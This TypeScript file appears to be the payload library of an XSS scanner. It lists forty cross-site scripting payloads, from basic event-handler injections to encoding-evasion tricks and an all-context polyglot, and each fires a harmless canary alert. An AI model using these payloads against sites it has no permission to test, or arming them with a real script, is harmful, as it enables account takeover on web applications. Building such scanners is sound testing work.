import type { PayloadDefinition } from "../types/payloads.js";

const CANARY = "kovar-xss";

export const XSS_POLYGLOTS: PayloadDefinition[] = [
	{
		id: "poly-001",
		name: "img onerror",
		payload: `<img src=x onerror="alert('${CANARY}-poly-001')">`,
		contexts: ["html-body"],
		depth: "quick",
	},
	{
		id: "poly-002",
		name: "svg onload",
		payload: `<svg/onload=alert('${CANARY}-poly-002')>`,
		contexts: ["html-body"],
		depth: "quick",
	},
	{
		id: "poly-003",
		name: "script tag injection",
		payload: `</script><script>alert('${CANARY}-poly-003')</script>`,
		contexts: ["script-string"],
		depth: "quick",
	},
	{
		id: "poly-004",
		name: "event handler attribute breakout",
		payload: `" onfocus="alert('${CANARY}-poly-004')" autofocus="`,
		contexts: ["html-attribute"],
		depth: "quick",
	},
	{
		id: "poly-005",
		name: "body onload",
		payload: `<body onload="alert('${CANARY}-poly-005')">`,
		contexts: ["html-body"],
		depth: "quick",
	},
	{
		id: "poly-006",
		name: "details ontoggle",
		payload: `<details open ontoggle="alert('${CANARY}-poly-006')">`,
		contexts: ["html-body"],
		depth: "quick",
	},
	{
		id: "poly-007",
		name: "iframe srcdoc",
		payload: `<iframe srcdoc="<script>alert('${CANARY}-poly-007')<\/script>">`,
		contexts: ["html-body"],
		depth: "quick",
	},
	{
		id: "poly-008",
		name: "math namespace confusion",
		payload: `<math><mtext><table><mglyph><svg><mtext><style><img src=x onerror="alert('${CANARY}-poly-008')"></style></mtext></svg></mglyph></table></mtext></math>`,
		contexts: ["html-body", "math-context"],
		depth: "quick",
	},
	{
		id: "poly-009",
		name: "javascript protocol",
		payload: `javascript:alert('${CANARY}-poly-009')`,
		contexts: ["url", "html-attribute"],
		depth: "quick",
	},
	{
		id: "poly-010",
		name: "template literal breakout",
		payload: `\${alert('${CANARY}-poly-010')}`,
		contexts: ["template-literal"],
		depth: "quick",
	},

	// --- Standard depth payloads (encoding evasion & context-specific) ---
	{
		id: "poly-011",
		name: "double-encoded angle brackets",
		payload: `%253Cimg%20src%253Dx%20onerror%253Dalert('${CANARY}-poly-011')%253E`,
		contexts: ["html-body", "url"],
		depth: "standard",
	},
	{
		id: "poly-012",
		name: "null byte injection",
		payload: `<img src=x onerror\x00="alert('${CANARY}-poly-012')">`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-013",
		name: "mixed case evasion",
		payload: `<ScRiPt>alert('${CANARY}-poly-013')</sCrIpT>`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-014",
		name: "event handler with newlines",
		payload: `<img src=x\nonerror\n=\nalert('${CANARY}-poly-014')>`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-015",
		name: "svg animate",
		payload: `<svg><animate onbegin="alert('${CANARY}-poly-015')" attributeName="x" dur="1s">`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-016",
		name: "input autofocus onfocus",
		payload: `<input autofocus onfocus="alert('${CANARY}-poly-016')">`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-017",
		name: "marquee onstart",
		payload: `<marquee onstart="alert('${CANARY}-poly-017')">`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-018",
		name: "object data javascript",
		payload: `<object data="javascript:alert('${CANARY}-poly-018')">`,
		contexts: ["html-body", "url"],
		depth: "standard",
	},
	{
		id: "poly-019",
		name: "meta refresh javascript",
		payload: `<meta http-equiv="refresh" content="0;url=javascript:alert('${CANARY}-poly-019')">`,
		contexts: ["html-body", "url"],
		depth: "standard",
	},
	{
		id: "poly-020",
		name: "style expression",
		payload: `<div style="background:url(javascript:alert('${CANARY}-poly-020'))">`,
		contexts: ["html-attribute", "style-context"],
		depth: "standard",
	},
	{
		id: "poly-021",
		name: "video source onerror",
		payload: `<video><source onerror="alert('${CANARY}-poly-021')">`,
		contexts: ["html-body"],
		depth: "standard",
	},
	{
		id: "poly-022",
		name: "single quote attribute breakout",
		payload: `' onfocus='alert("${CANARY}-poly-022")' autofocus='`,
		contexts: ["html-attribute"],
		depth: "standard",
	},
	{
		id: "poly-023",
		name: "backtick attribute breakout",
		payload: `\` onfocus=alert('${CANARY}-poly-023') autofocus=\``,
		contexts: ["html-attribute"],
		depth: "standard",
	},
	{
		id: "poly-024",
		name: "closing tag with space",
		payload: `< /script>< script>alert('${CANARY}-poly-024')< /script>`,
		contexts: ["script-string"],
		depth: "standard",
	},
	{
		id: "poly-025",
		name: "comment breakout",
		payload: `--><script>alert('${CANARY}-poly-025')</script><!--`,
		contexts: ["html-body"],
		depth: "standard",
	},

	// --- Thorough depth payloads (advanced evasion & edge cases) ---
	{
		id: "poly-026",
		name: "unicode escape sequence",
		payload: `<script>\\u0061lert('${CANARY}-poly-026')</script>`,
		contexts: ["html-body", "script-string"],
		depth: "thorough",
	},
	{
		id: "poly-027",
		name: "html entity encoding",
		payload: `<img src=x onerror="&#97;&#108;&#101;&#114;&#116;('${CANARY}-poly-027')">`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-028",
		name: "hex entity encoding",
		payload: `<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;('${CANARY}-poly-028')">`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-029",
		name: "tab/newline in javascript protocol",
		payload: `java\tscript:alert('${CANARY}-poly-029')`,
		contexts: ["url", "html-attribute"],
		depth: "thorough",
	},
	{
		id: "poly-030",
		name: "data uri svg",
		payload: `<object data="data:text/html,<script>alert('${CANARY}-poly-030')</script>">`,
		contexts: ["html-body", "url"],
		depth: "thorough",
	},
	{
		id: "poly-031",
		name: "base64 data uri",
		payload: `<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgna292YXIteHNzLXBvbHktMDMxJyk8L3NjcmlwdD4=" onclick="alert('${CANARY}-poly-031')">click</a>`,
		contexts: ["html-body", "url"],
		depth: "thorough",
	},
	{
		id: "poly-032",
		name: "embed src javascript",
		payload: `<embed src="javascript:alert('${CANARY}-poly-032')">`,
		contexts: ["html-body", "url"],
		depth: "thorough",
	},
	{
		id: "poly-033",
		name: "form action javascript",
		payload: `<form action="javascript:alert('${CANARY}-poly-033')"><input type=submit>`,
		contexts: ["html-body", "url"],
		depth: "thorough",
	},
	{
		id: "poly-034",
		name: "isindex prompt injection",
		payload: `<isindex type=image src=1 onerror="alert('${CANARY}-poly-034')">`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-035",
		name: "svg use xlink",
		payload: `<svg><use xlink:href="data:image/svg+xml,<svg onload=alert('${CANARY}-poly-035')>">`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-036",
		name: "textarea breakout",
		payload: `</textarea><script>alert('${CANARY}-poly-036')</script><textarea>`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-037",
		name: "title breakout",
		payload: `</title><script>alert('${CANARY}-poly-037')</script><title>`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-038",
		name: "style breakout",
		payload: `</style><script>alert('${CANARY}-poly-038')</script><style>`,
		contexts: ["html-body", "style-context"],
		depth: "thorough",
	},
	{
		id: "poly-039",
		name: "noscript bypass",
		payload: `</noscript><script>alert('${CANARY}-poly-039')</script>`,
		contexts: ["html-body"],
		depth: "thorough",
	},
	{
		id: "poly-040",
		name: "polyglot all contexts",
		payload: `jaVasCript:/*-/*\`/*\\' /*"/**/(/* */oNcliCk=alert('${CANARY}-poly-040') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert('${CANARY}-poly-040')//>`,
		contexts: ["html-body", "html-attribute", "script-string", "url", "style-context"],
		depth: "thorough",
	},
];
